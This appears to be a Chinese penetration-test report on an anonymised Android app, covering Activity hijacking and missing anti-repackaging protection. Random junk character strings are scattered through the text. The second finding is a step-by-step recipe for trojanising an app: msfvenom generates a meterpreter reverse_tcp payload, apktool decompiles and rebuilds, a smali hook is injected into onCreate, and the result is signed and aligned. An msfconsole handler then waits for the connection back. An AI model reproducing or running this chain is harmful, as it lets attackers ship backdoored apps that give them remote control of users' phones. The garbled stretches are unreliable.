0 \* ?( G5 E$ T5 [& J1 X$ m8 q6 e. e
X5 x& T: W( i
. s* m: I$ I1 D3 v* z: @
. q# A+ h* Z' F8 l/ _& \
5 b( P1 o: a6 t0 b: S2 d 2 检测结果
+ _2 I5 j- f) f1 s7 Y. b
1 _( F! }0 p, u N
& Z9 Z& b. t# I+ y2 S- h9 p8 _% e9 ^1 _
; v- I$ s4 F6 m7 X5 x9 g6 } ]" N
" S* j& H' ` i3 O 2.1 某某某 ( x( k2 X; t- {0 @' {
) A& }6 x# ?% w& R
( m; s" x/ ^' p! b& u' [3 _
/ C* b* h# F) k* }: r % `+ F t# Y4 {( Q
7 B7 O+ k( V* Q9 e' d/ [- l: P' |
2.1.1检测目标 ' q: J& I# {3 M: [
8 m4 G0 ?; H! k
* _- C) E7 X: i& c$ c8 p7 ?9 Q, N
. r! p6 A' ]2 ]- q. X( X- Z" F
. i8 T: E6 k9 c- u. X
& a' Q. s3 G* P+ @ 目标地址: 某某某某某某APP " s& [! K: ]' c( u. S) g- B- }6 S
5 @4 D, ?" r+ S# ]5 Z
% m3 j# B, N% p" v* x
7 h; J6 p" @+ T8 ?! N3 V7 |+ D
/ Y& W+ j. m. i4 @8 a: T I5 M8 i$ m
3 C; D5 n+ F0 L5 r 2.1.2检测结果 # P& p) S3 L/ w+ t6 w, J
/ g4 ?, c7 ]* r' U
+ N9 n7 l' D J! D
. V. o! o! F% @" _# X% w( I }7 A4 y & r+ m) d' i! U
8 G5 x- n4 u; t/ B
2.1.2.1 1 b8 P* {6 v' ?* U0 o5 {
$ c) n+ k& M. X* N& `- P0 h& C
0 D/ |0 [0 b5 e3 B% b
7 j' ~0 d; Q0 t1 @5 v1 q/ R* q
, M% J- ]: x9 Q$ x! ?: |
; ~/ A" v" _# |; q 漏洞链接地址:某某某某某某APP ( w `* C/ C# ^+ P
$ o( r* a( V4 o* }
: c/ \+ p! u D7 W- k
" d$ ?& L" e& w
$ I) I1 v% P" Y1 p8 v. u, [ d- t/ x1 q& W3 `
& e d4 f! \0 L/ T. l$ J( o. h! [. {: t$ H6 c. s- G/ b: Z ^
A0 x' k6 l( y3 M5 y8 h3 T
0 O0 f6 O9 m" F, [& h
& G! G h( [" F$ F1 I, r# \* S" c
8 T- j/ c; b! {& N% j7 d 漏洞分析及取证:
. a- Y. P( n9 r" W
* o$ {; }0 @* P4 I
4 G' L% Z1 y+ ], e& f
8 f' z7 \% B* l K# r( K7 ]
- E! Q) V0 A8 ]4 Y) v
0 Q# g W, b6 m! `2 o 通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 8 m! Z3 U) ?' h, O8 b7 G
# ^ [/ o! u/ @
) W; n5 t A0 x* @ E0 {3 B. I" R
( ^6 P. h/ S1 f% h; K ^+ C- \. q2 p `9 i a
& @0 I+ o* X8 N3 O# A- X
7 z% B( }5 G, z+ r# Y* u6 e1 O2 U; y
8 w( N% [' @ n& K" z0 D
, y7 m5 L) z( A2 J" e3 a% @ Z. \' P# N: `. K' d0 U
% J& n" Z! N. K _2 P1 w
* Y: A6 d6 Z2 ~8 G . b5 b2 `, E# K5 C# v
& o# h1 q( f1 V- J* F
9 d6 Y& K5 w% d# t
9 V( c7 h! u; @4 `
3 w# }7 T( v# N8 D* |! d
( P4 c$ ]9 M; i, k' i, U9 {
, `9 a2 p! j! e7 X( m6 z5 M; D- O$ M" x. J7 J
- R# M: h. F N i9 I) ~$ G; G6 R* N; g5 t: i6 J& A9 @8 `
]3 ~! N8 U0 z% n5 j2 o( o R4 F5 p
/ q: a, T- Y5 o s
0 ^2 @+ \" [' Y4 v
4 P1 ~$ C5 G i" w0 F
5 D5 _' t1 E! v0 K+ b' L ) I y& Y9 e' R8 ]% @& w* ~/ O, P! Z
: t7 p9 F6 I* R% s3 N1 m+ H 
( u" E( b8 E+ w" A ~( t
/ q, V9 n: ^: ?+ a
% P4 E$ u* b$ t+ E y8 ]% H3 W% R- p5 N
( [" ~5 s0 R, W3 n# m. n
6 D! O b0 P0 \( Y* v8 ^( q) {: ?5 c1 z+ s
漏洞危害:高 6 w. H3 m! F( x- w, j% m
/ A4 Q+ Z/ B# ^3 `
0 t& p0 K$ [( e! U, D g' K
' l; x" Y* m7 q B6 _2 m
$ E* v# S3 N7 c6 }: f
% ^) c; I7 P( I' a
% V l# K& `7 i0 h' g
7 V3 N4 K0 O; W$ o# [* P% V L/ Z; Z5 f1 j2 E6 ^! f7 d9 C
" A( H# a' e* Q: {- w
, q- ?2 S5 J) E9 c, g2 F2 d: n' J# a0 m9 Z& ^1 Q5 h# s
|
% s& A, d3 k/ V& a, Y- f5 Y7 H% M# f
3 x; H0 S+ Z2 U" `- @1 a j( X
9 T8 r: } z. N S
严重程度 `2 v5 y0 [* ^
2 O/ W( c; F H) z y0 s
( V# `5 P( H9 C. U* K7 i( X: X! S8 \
# Q, f0 b. G4 N3 G3 t7 t | 1 y& f# u3 s. ~/ W% u+ B
" |3 E) b3 W+ m) V9 L( F
* }! j' _. W1 }
3 m, w5 k) J7 J! b
0 S) j V6 d( \! @7 X% I1 v7 T7 h
9 ]% s3 d3 ?2 _0 E9 w8 J$ s& X; ? 高 / G5 w* n# f+ c: w
) {1 O; [$ ]/ C% H) M
3 M# M) l4 H' Q: J8 @) r
; S& d O4 Z8 | _ | % H% s3 P. ~" k) B5 ~
9 O8 s3 P7 _, E0 L6 k
( L7 b% Q! Y; X- S2 H5 w" W. X0 f8 _ ?2 P- I* @7 v3 |5 q
; d- R8 X" W! `
0 m0 f4 L5 x9 @7 }
■
9 Y& h( J' b8 q4 x! t9 p* Y# U( l! ^7 o- E8 {
9 _8 v: B) [3 g1 g2 X; M
( C8 v, `$ P# x5 D( q1 h |
$ w# [% I4 T2 o) F$ D9 A6 [' @
. r5 p6 y% q" C" m& r4 T3 z ( W+ ~0 I1 P; `8 z& r
4 j! }- ~) P1 U0 d
( {. R, P1 u$ {2 G+ F
) r \1 n3 B- J" } 中 . O/ m) ` ^0 D7 P8 S
8 x6 R( h' r1 o8 O5 r, Z2 {
5 K) a: Q9 `: H0 B+ p; @
: e$ a4 ?) v* q# p | - r; x7 l' y4 S, Z
7 u5 b- S' t4 S2 J u
1 P9 l( x+ R# C) Q& W" N( W# I. j1 k* @& a$ A6 l n9 p# z
7 g% |9 p: H/ I6 w) ?
f! V7 s/ Y" Q: ?0 N7 j! N
) j, M* j5 I( d1 H* ]/ s! d* A5 G1 l; K- g9 v% V% s; x
- D) F/ L, ?9 e9 y, i8 j
( e+ q R* J9 g, N
| 2 y3 @1 H4 E' G6 k Z m
6 j6 o& c9 G2 Y* W
, B- ^0 s0 T* S% S4 { i7 x. R( T3 [5 D1 m7 \5 b
8 y8 X b+ r7 K# g. u
1 @% E. ?4 m5 P5 G8 A 低 - U, C% N3 {" K" a4 ], C
0 S! e( Y3 ^6 \2 b* Q2 a: y+ T
, a# o ?" x G9 `% h3 O. _2 b# Y; J4 M2 d- P
| - t) c) L% Q, u+ G
! }$ [. C. _- \
- W4 a- C) o" @' c" I# E, i2 o& b; K7 M! u) i
9 z$ a* Y: O/ S5 }( _1 u4 r$ K& O2 y$ Y# ^/ T( Z
% D/ m8 d6 Y1 x6 F j
" C+ M' H- n, B) h( ?& Q! K" C
# b: j4 j0 s, w+ k) a6 |, H* J' r- e
% p6 M0 R- @3 X) C. u2 O: k | $ a+ Q1 o3 M* d; C
) U; Z7 `) I6 @: l$ Y
: J4 r2 H) I" {/ y$ `
( Y" ~. _: i8 e- u ' e. Y3 ^( e* }" Z8 i
$ \& Q, m* p( A- n' h; | D
, x+ {& ~; G2 c* u( S4 P6 C% w* p
% Y, @4 J9 t: f
- @, @1 f) ~1 `: M" W( m. @2 j& a0 D" u) b; m* [/ }- P; O
$ E0 g5 e$ [) |4 ?& w& d. E' U9 E1 f8 r \( R
) N* l* y& t# E& F& y8 U
- P! c$ d8 T0 ]7 d# V3 S% `
9 E" A" h) R3 \, ^+ D" E; V- w
4 m( @5 A$ i8 m
. P6 b7 I9 o2 I, G1 Q& m: S
/ A7 P' Z5 z+ @; r 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 w' W) \! B* n0 R: W7 O
- e7 T5 L9 [6 j5 b8 ~; G- L
; A. T' [* l# A: O0 b+ p
6 W. A$ _: O) E) C6 Z1 N 0 S5 m9 Q9 G, @: ]
/ C3 v% P% ^% n! l: }8 Y
4 E( y$ W9 x% W: U+ L1 T5 k
1 k; N0 H9 s# u, z# X" {
! N9 C' C g4 p5 F6 T+ K! g, h" m) s/ @% r, V! F% Q6 U
1 [ r' \! T% h8 Y6 c6 M7 B6 E. ~# [4 g1 t/ K3 K
" S6 N( R- ]5 r+ N' Q; B& O
) |5 a7 L' ?' E1 {- I7 X
% E2 ^7 F; z" Z3 Q+ y0 s
$ ^1 ^! q# \7 C8 ]
0 p: a9 \, A q8 Y1 }5 v/ J9 k* X6 q" I, `0 Q, U: k1 G6 [
2.1.2.2
. d/ c' `+ O9 O6 R& }1 i, S a1 |
4 B/ `! y* P1 V: ~* {
! ]' d2 m+ h4 ~
. J8 l& m+ q% O2 g0 ?% h
$ E6 Q8 l, \0 V/ c 漏洞链接地址:某某某某某某APP 3 {$ r( ~9 h5 Z2 k# Q# }1 Z
! }+ d- ?% f$ M( ]& M( V
, L& _/ P, y8 O6 b
, j2 d& D6 Y3 J5 s. M- y
' ^8 N/ U* H1 {4 i6 }: t4 W' }( \1 H* j
漏洞分析及取证: + u$ N4 z6 ~- ?; x- }) R
4 y0 X; s% d! B0 t! i, k7 g
* k0 M) A3 M& ?; M u& `
) L/ G- R% M/ U4 F2 E$ s% n1 t
/ J5 o1 D8 b9 O
+ f4 y4 v- Y. ?4 q( } 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 6 F" P) x8 t2 R, p' D' \8 a- T$ m
+ R. Y9 f+ ?" s7 v7 B5 j
9 n3 e% Z6 M w" j" f
D0 L ?2 \9 O
, \6 ]" G5 l0 D
- i4 x7 w9 O, |7 B5 D" N3 l
用Metasploit 生成木马 apk
& r# o1 J2 c0 X" i. l* G3 J
0 d, J7 J! P" o7 M
4 l A3 t. A) i7 A* g
5 o- }0 U* P2 D1 y0 O& w
5 I8 v# A" \0 R" a/ p. s
" ]0 |, e1 \! X" K msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk % w- Y3 c" j% {7 f% e
~: M/ N Q. n( }% Y
7 M6 A7 a, F' ?0 |' T6 v& K3 {) P
! A! Q* X. g! z7 ~) D W9 n, U ' G1 k9 A: j' V7 ]4 _ N
! a1 S- x- I7 Z7 C7 ^ 反编译目标apk和木马apk 3 O2 U, A3 e( F" Y1 D
2 |6 A$ B+ R0 K) t2 D4 \
& [8 `' g, O7 N: J- Q) J) V
9 I! x: J) Z/ D, X( `0 H/ i
$ M4 E: T5 y/ T1 ], a5 a1 x8 `: h! R7 h$ {: |8 Q1 N
apktool d target.apk
+ {7 G; T$ g; z U O3 G
9 x; W& K# q+ K' Y: |5 I apktool d cockhorse.apk ) R8 Y% U+ y" ], C$ \, a- ~9 \
9 X4 `4 `- B" F; |
/ T9 }/ {9 y! C! u! O- \+ o
- _6 O1 d; |4 `# x" F/ P+ j
- S. [2 ]4 M( r( P s/ b
# G; A1 A6 O0 P. f2 t 木马 apk 注入目标 apk
3 C+ g* w: M+ y
, _( t7 r3 |5 E7 @- j1 Q# p
/ y. a# r1 @$ H3 s
, S" E1 W3 r! O9 @4 \. r% C! J7 S0 I
$ \; H7 X0 A) `/ q) M# v ~. a9 D# E* t, S$ m9 m9 P. H
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
& m$ F+ X2 ~; ~0 }1 |! r9 Z8 T; K- g% t K
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V - n( t V! q% m% J" X
# o6 _* ^0 ?' |; z5 Y; q. l
9 ^: M) L' H, \0 ^& [: }% t4 ]
( s4 `' t0 t" W% H9 i% o . m1 B' A/ ~' E1 g
' z$ |: I3 [2 F3 X
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 $ |: S3 L3 [5 L% n9 {" L
& D! g. S7 H. S$ I8 j: |1 z& F
8 d# f- m4 V+ a7 e9 E0 n( j
" {* N3 L; C5 z. ` , j! m9 d0 g" g2 q5 f
* t& k6 ^% E6 d; v7 Q! A4 s1 {5 B 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
; ?1 u0 Z& w9 u7 @! V
0 ^/ S( K( N; V* I! j4 D0 b( u9 f
) y. A* ? C ~4 |0 z+ |, ^8 e. I/ Y; o6 L
! H+ e P, e; K* L2 Y8 Q9 O
! z' M6 O z( s0 ] |8 ?- l
回编译生成最终 apk
/ X9 k, i8 w8 c
# G: O" V* K% Y; {
1 K7 M" P) ], Y7 Z
2 y5 a3 P: ]2 s; F
+ N2 ?2 @* d0 ~1 w) `* I2 o! U( ~
重新打包
; O( P1 w1 F$ B% o
; v; _. `, n, e1 k+ u6 }& m
) q0 ?, L1 H" d8 g4 w( [+ K4 m; g' \0 F! w& w9 _1 `8 L
% r$ Q6 K7 Z6 _9 V: v4 e+ d
6 t3 j; s, S; G
apktool b -o repackage.apk target_app_floder * y" C R$ G5 t* H5 j
* ?/ X+ n' o) b7 ?' C# H2 ]
: B: F! {$ b$ n7 H2 o
/ d& j0 A% [% @; e" N
% e) t4 ?3 B6 x
, x5 U) O! Q% g" X) f* s6 n+ x$ L 创建签名文件,有的话可忽略此步骤
6 T" R: }6 U) ^, B7 M- s% x
0 S; i2 k8 K& X" E
" s, W3 }& M8 @* C0 m* h2 M
9 F5 c, c; F1 m4 p7 f" P
0 M, c0 K5 Q% r0 v' c( A6 Z
M: z( {5 ?6 N7 y9 K' I
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 . r" O4 w4 |% Y l1 L
$ J" E0 s. n. u/ k2 a8 ?- f
& F/ z& D8 L1 t% Z, @2 ~5 @, t$ q- h! u8 G# L4 s
9 z& P) _: \ t
5 U! ?/ L4 W+ x/ m9 q- X( e$ U
签名,以下任选其一 0 t |1 [4 G/ a+ _6 C* h L
' Q l& C2 A7 E P' u3 b
9 H4 @% v& s- {0 N: v% ^
: x- a9 Y6 f E6 `4 i
" l) o' f0 `/ R0 g' Q ]. o% I/ H5 m
jarsigner 方式 + K$ f( F& [/ x; N9 g) g8 e9 X
* {: D4 g1 v/ {! T3 h5 I1 K
- y8 [* y" k9 S
8 k3 Z3 Z. i2 l) R9 v" Q' p1 \ 2 z1 C( ]) m* A7 R6 { Y
9 o- q/ ?( K2 D, v8 O. {, L jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 7 ~: v2 ~% a+ ^
. R8 b4 z% a# N- Q c
% l. M3 u- Y( Z1 ~4 w
; `2 T1 ]/ n! a
9 _ a' }: G/ Y1 h9 \: y& w1 o3 W/ t& h' Z, Y1 [# e
apksigner 方式
1 K5 {6 i" p7 N) t. y# ]- O. m( e, t P- Z& j# l% r5 E
" U& `' p% g1 e
2 |! k: v& d0 y7 P. v% F9 l) U" Y
4 s7 `" V' g7 K, V& Z( O$ b# F y; Z6 c2 ~9 }5 t
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
) q- _3 o6 g7 z G. {
/ k" [; x t R/ @" A& p6 C
$ o7 K' ^ T$ U' k; C% }
9 O# }* q8 ?( T8 J) J0 K2 m / c2 h) I+ T6 S5 \; c8 P
/ b7 t5 R. E! M: B- T$ x( f! e 如需要禁用 v2签名 添加选项--v2-signing-enabled false 7 v5 G& F! i- A y4 r9 w8 c
) w9 T$ o+ g$ K6 I8 {- {. P. x- ~
% l9 `, [( w, Q+ s3 _$ G) @3 R
$ Q! d7 T, n. `& t+ u2 j
0 K B! a$ J' J2 o3 V9 d) l
6 v1 R; k# |. A. V# s9 H( _4 T 验证,以下任选其一 & @4 i/ J0 K K* N5 k- e2 I
, y$ \7 ^5 H5 y
# t+ T; N& R7 Y' b+ }
( q2 n9 N3 `/ y( {5 X" v
- R9 ?3 L5 Y4 \5 w- X$ ~' W$ E" R3 Q8 c
6 e6 o# I# [; v jarsigner方式 $ w0 K2 Z+ u% s# \- r
* E- F! b' |4 c
4 d3 A1 @% }8 H/ [' F8 Z
4 A! Z$ Z8 b7 e1 X+ @6 n ; W2 ?2 M9 Z H. p# h
+ I/ S) T! N- @# q5 u# A& s# e jarsigner -verify repackaged.apk - v8 E" \% G" k
3 r' _) q, b1 p5 |2 h0 W
8 Q; `5 o; N( _$ Q% c% F
5 \( C5 ^5 u$ V& Y# {" z" S; i+ ^
* w5 B% j8 a/ B! M( e' N$ i2 k) b' E- u A" [ p
apksigner 方式
; }8 G+ X9 \. e% E# n+ I [/ z5 q; G: Y
2 F4 z& X( j2 E/ r3 T
7 P# {' H$ k+ M% T, k+ E. \
% `" F3 n8 y2 W7 m3 b5 f
0 N U; k4 r! D# \! O apksigner verify -v --print-certs repackaged.apk
! r/ E- [6 i9 t& n: d* y: p1 z% X
7 J& [" v K. y0 k, [+ C
2 h5 r& n7 m; c& P; H
6 b- H5 ]& s% _ I, Y" [ 6 t9 C* O9 u+ c- _6 Y1 y7 ?
8 b/ E8 H5 [: t$ _% R keytool方式 0 \, X! E) I. S$ b! ~- Y
# Z/ l, q: R0 s4 l; F/ _+ m+ g
- ~* Q+ |! t: Y. c8 j. j6 ?
0 k: j0 y, ^8 q6 V) `: ^7 h @
5 g4 ]0 ?# U# W3 e% i: J) y
. ?* J( E! u% i. V6 t6 l; K: s keytool -printcert -jarfile repackaged.apk
: d5 R$ M' c F
# |- V9 V& _3 x7 M3 Q$ y/ L
4 f% X0 J: h, o" D) Q2 E
% N7 @# T3 F5 U/ V
- G' |" T; M% T5 ~- z" Y
M# k8 E8 S3 |+ D" t% I P A 对齐
- _1 M9 F, e" a" b- R1 ]2 s; I! o- j2 \5 \- L# `. t& K
' f$ V6 f( ?9 D7 I& x, G) G2 f7 @* E' Z, D; x/ a
H2 X9 y5 z$ V
7 E5 g0 w8 u) x, q 字节对齐优化 * j# p- z, V0 k& ~$ n ], a
3 E( F, e* @2 X4 ]: Z* ^; f
% t( b% Y1 ]# J4 J. U
9 L( D5 z: o1 w- @( c7 `
" |, H# Q; X" b7 ]" f& ~8 O' @
% C# z+ f$ }& ~, x+ `8 C zipalign -v 4 repackaged.apk final.apk . f6 L2 s8 P0 L Z2 V
; d7 R9 |# H- Q$ Z7 S0 \% G: }8 ~
1 x( T! P( t! x$ u9 r/ k% o
8 S' B1 i$ u, U8 n4 [1 O, n
4 T0 B0 M5 j9 x4 d: S" c4 v$ x: Y
% Z8 {, x& [2 C# f$ l) x! ~. p; @1 ^ 检查是否对齐 0 {1 p+ H$ W: ]9 O
0 J. M( b5 Y1 o& e
" |) c, g& t* G3 Z0 U$ t
5 I- l3 F1 [# b, M( Z2 i- H
# v5 p+ f( c4 i5 F
6 |0 }9 `' k! q zipalign -c -v 4 final.apk / P3 ?0 A/ ` v' {" \+ W2 I
w8 f: [& ~; }7 N0 i4 k
4 f" x: R& w, ]' I9 e/ P0 [ W" }! d- R& m: ]2 I: u
& v/ }$ X% i0 n3 c. F) o
6 q e6 D! x, m
注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
5 U- N9 p0 e* k, J3 w
, i0 A; |6 m& w0 `
2 i0 a! q4 Z( d. R+ a- C- n
- ?8 ?4 P; `- p6 }
8 z8 V1 E/ O0 k% T3 v% y
/ W7 b, M. k" S8 C1 F. Y 启动Metasploit控制台,配置参数等待上线
) k1 W% \0 ~" f$ F
% y8 A; K) I' ]2 L+ E
+ y* ^+ A* U7 d: O4 i. k6 |" {
# ~* @* X) r; c4 X- N- a& i3 b. a
* E& N. p M+ `! l
: @0 \) i9 l) d
在终端依次输入如下命令 % z; G; n( g8 M1 T2 h) }
4 I7 T1 L& ], z: P& h! m
: ^# @2 |7 {) a3 v
- R/ K9 T, q7 G) L9 M" [& T
& Z' @( F g' C' Z! O( M3 y- x+ b
/ e' B/ F) ~4 A. ~8 | msfconsole X0 Y% S' ]. m. g, @0 ?" O
, K4 O" e) h: @! w) Q( c' |
" E' ]4 ^( |' T+ A/ I9 d; B% S( w, ^& x- q* m: Y0 k m9 w% m
2 E3 Q, G7 Q% c8 c$ |# x0 | g: a
, [5 ]; d9 Y4 f+ v( l) Y- h use exploit/multi/handler
% R+ I8 T$ j; _
5 T J$ W6 T/ P
9 N) r9 S. A. n' ?. [ d E) u- I
# L8 C+ N4 H. S& V5 w4 F* z
' r9 H* g8 E1 P/ k/ L1 T* a; @
" L, T G1 }/ m0 f0 c& F4 W; ~ set PAYLOAD android/meterpreter/reverse_tcp
- |& H% A& K& b! k# H( k3 i( z) |' C6 S0 u N u0 V v8 q5 [; _
. C% P0 j* Q' P" Y; M" c. p# i0 T( y% I# U+ C
! C; F5 S$ W- V6 G* V1 ^# P
3 H+ |! \8 \4 Z' t( e2 A0 l4 O! m2 U set LHOST 192.xxx.xx.xx
5 u4 R& c, @* J' s7 u* v# X! ]' S& U0 @2 R1 g; r3 S
1 K2 }* j. t' t3 G* ]7 U
s, F8 k) a0 f7 o% ~
% q, x+ h" O- w* }3 r
3 ~. P# a$ u9 h/ X1 R set LPORT 4444
' v& O- A" U! Z9 p7 V+ \% f, U; l* q6 r3 i8 u
1 T' C& T& [* {3 z B& v
; \9 J* ~/ x% a; \, R: b. F' \ 7 @. Y. O9 O0 g( E+ p
/ O" _) \+ U2 o# m8 K8 j exploit / U" o2 d# R8 q- Z) _# c9 D4 g! [+ f
1 N6 V8 c9 r% K
3 m' |& W. G2 o6 {- n8 E) r$ B
A3 v8 g% _ b$ k + F3 a/ L# e4 } h" h+ S3 `
& Z, m& s, b, U* b3 Z2 D2 Q0 a6 g" \
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: 
! T9 m4 t4 _- G& ?8 a- t* D$ P2 H4 q6 C5 i5 s- t) K+ }, z
% C) ? Q. @" A7 b% }$ T
, \ k3 @4 u& ]
, |* _( N5 v! F
8 a+ P0 D* X/ W# H, \ 漏洞危害:中
+ c7 C9 F+ Y$ ~$ H# I0 d
. {0 m1 a5 ?; | k9 p* V/ O
1 H0 i' s# H4 e. k& ]1 C- G3 x
$ y8 g8 B' M- p* K- Z
" m+ A$ C P/ f9 n, w
0 {2 n7 U8 k! j5 s1 q, V. V, Q 9 W% ~1 D% f+ ]/ h. V
4 M# z+ ]+ S$ j" f+ O% I " K. {" F$ ?2 A' D- I6 ^, f
! k7 ~0 [9 M3 t a) n; T6 B 7 a0 M0 d$ N A2 i
Z4 D; R( X0 ]
# v0 J9 P% K* c2 m7 \6 R2 [4 j1 C
| % h! |# S2 Z" y4 \7 N
; |- _$ ]& H3 l% k( l8 W l V' s
$ U8 g0 q0 a4 |9 W9 h0 M7 R: | _4 P2 j6 V: \ {: S9 U, H5 p
严重程度 " |8 A. B+ p' j* p- G
' M+ C4 m; Y( g! A L
9 w$ \; Z$ g* t
7 T) o( Z; z7 O9 } | ( ~# ~0 @0 S' y! k
8 ~. ^3 [0 A9 }: D) n( \" F
5 `+ p+ q3 n* s# o0 J
5 \; Y# g7 l! [8 z) j, u1 C + O8 t" E$ b% C7 o/ t. r
; ~! w2 a# h) Q5 P& g; h6 l 高
9 l# N* m" {, a) q, Y$ B5 i9 x: z
7 \: x' P7 |0 r& c$ t) F, |% w) S. K% g3 ~8 k, R( h
|
0 q; B1 m7 I* p9 G# D c# Z! N1 l% Q" m- i1 X, W+ C+ _* M
4 z) d2 A6 \* q3 ?9 a2 E A! o1 `5 Q4 d
; `8 |6 y1 C2 E$ G m0 S; B( f
7 F% |6 Z7 L* j- c/ U ■
( Q$ q! V! l3 J+ e L
2 u( N: l6 g% f$ s/ F
( I- Y J) P- g! B
* A" N: g0 E& W& C4 Q/ @5 f |
# u2 d' n# l# N
1 O" k3 F7 I4 I$ r1 i% d/ C" ^ , N1 q& v4 }4 `* {0 u( ?! W. C6 `
& k5 Y; r$ s8 \, _$ O' Y. y
" O8 e1 T' K( S" t& x# H# u0 k( R: v4 P9 o e
中
0 M5 `) E! X1 a8 e9 a& G) Y( [; I( h, f* ^4 r0 a5 t$ Z3 d% k2 A
& w# \) t4 k6 `0 B5 f. k: B5 |: p0 V: h
|
+ g9 Y# H& j$ d& V2 k1 R {7 |- ^9 w/ L/ H+ n/ r
3 V" ?5 H4 K3 ^" c' d
+ x5 Z3 V: _7 \7 V4 D! A' ^* z: n 0 `& ^# w; ~" H) y3 k8 P2 b
( `) k2 L3 R3 b1 g; _
. X# z- f; v: J' {7 \" B
5 N0 @: x' J( O# b + Y% c$ S1 A0 }5 f8 a0 r
2 J( ~3 G( }$ _1 X. e" `
9 h" N, S/ }3 ?4 \; u
; H3 P& q' J( j" N2 v | , q0 E6 B, j1 ^/ z6 p5 i3 p* P
& I8 _: a7 i# u5 F% G
2 B7 Z* W' }# f6 W' \
2 I) y K! L, `7 s) g( m
0 \4 g; p v& O; Z
) z5 m* k- K2 Y" Y. f. t* ~) ~( N 低
8 R' E- k+ } r2 k; P
& P3 r2 S. w" g5 ^' ~7 ?' S6 _
2 H; r- h/ W- H5 S; o2 ]) f- ^3 L! U6 b- c# u$ U! ]! G
| $ y1 W8 u- O! S7 t
' w/ z$ T% L5 }2 \5 J Z 6 L0 o2 f/ O+ T, U% f* O/ b
, q. W- m3 D7 F- A% r y6 Z
; N6 T) m/ T" n' |* m5 g! y" U
v/ `& P3 o# J $ p F" H. X- G. I3 Q8 }
M, O- M; e/ s$ o8 g) O
% b9 j6 S" _9 H( a; U
+ }7 w4 R# [/ l0 {0 {; S
$ g' O( r t* o) T A" H( l# x, P: G. {* v. `5 H( w3 k. y7 z3 ~
| ( {7 f7 }8 @5 P0 w6 [+ I! @
( [7 M- E I- t& x* d9 p- D
4 \( j4 [" S' f! d/ |
/ u# Q' Q5 c. }, M5 z
1 s6 W. P. b) ^4 E/ m. k% E( N: Y+ q' s! z
- w# j8 E( o& Q# @) t
8 s- i, O d! c: r U: V2 X1 ^
4 P U0 H9 `. A! U" n1 Z/ ?# |9 c3 |; o3 d. g1 Z& B7 L
6 a5 ]- {+ `: G% r4 M+ @% y9 `% J8 [; y- N) ]$ F
$ x0 t% N/ P/ t9 }9 H. X
/ b$ i) B' @/ d. B+ o1 `6 _1 y
6 ~3 O: g) T; x* Z
7 W1 z$ g+ B% d( ~! q ) h) x6 {7 H. ^! s7 }1 P2 |9 h) N
% f3 l4 @ P- y; d9 ?
修复方法:
( _0 ~/ Z7 ]$ K9 _& v
1 Q. ^% n5 ]- X- {- {" `
! E2 Q8 U" q+ s: k; d3 }
' f+ ~: I! Q! R1 \/ Q% W `9 c
) a9 n* l4 h2 E$ U
/ @8 n( R- S+ r6 Q# @ 1.在 APP 启动时应做签名校验防止二次打包。
0 a, M$ Q6 s4 W0 j# j& p5 }! D
& x% m# a2 E3 v: A7 L' ] 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 - ~$ [: z, j: T2 o1 ?
" }4 x: B+ t3 t# V7 p8 [& D# M2 A
% D# b0 I# N" q' _4 C" m4 X7 r H. h/ e
3 {9 R9 I/ p* A& J7 U- x" u
1 l1 m! k, @; m3 o; y; j7 V
& T8 U' y7 i$ v2 T& B+ m# T. e. x v! l! V
' d0 i* O0 L; \% A& b8 B
& `4 o2 @* o7 ~2 V/ q3 t
( S6 P. t* D; a% S; l& o/ p; ~+ ]
+ O8 @3 B+ m8 t2 H
l' t! Q$ X) I2 ?7 w, t$ W0 O$ ~6 c7 ?$ C0 q3 v
# S, ]) g* W; F& @, k3 c
7 F2 f* E& L. e+ ~0 I
, n# Q* V2 O$ I# G# X2 n1 j
" N! G s/ e/ M$ e) k0 T
3 Z, x9 l) C+ Z7 R$ {
, T4 h+ W: `8 z0 T$ f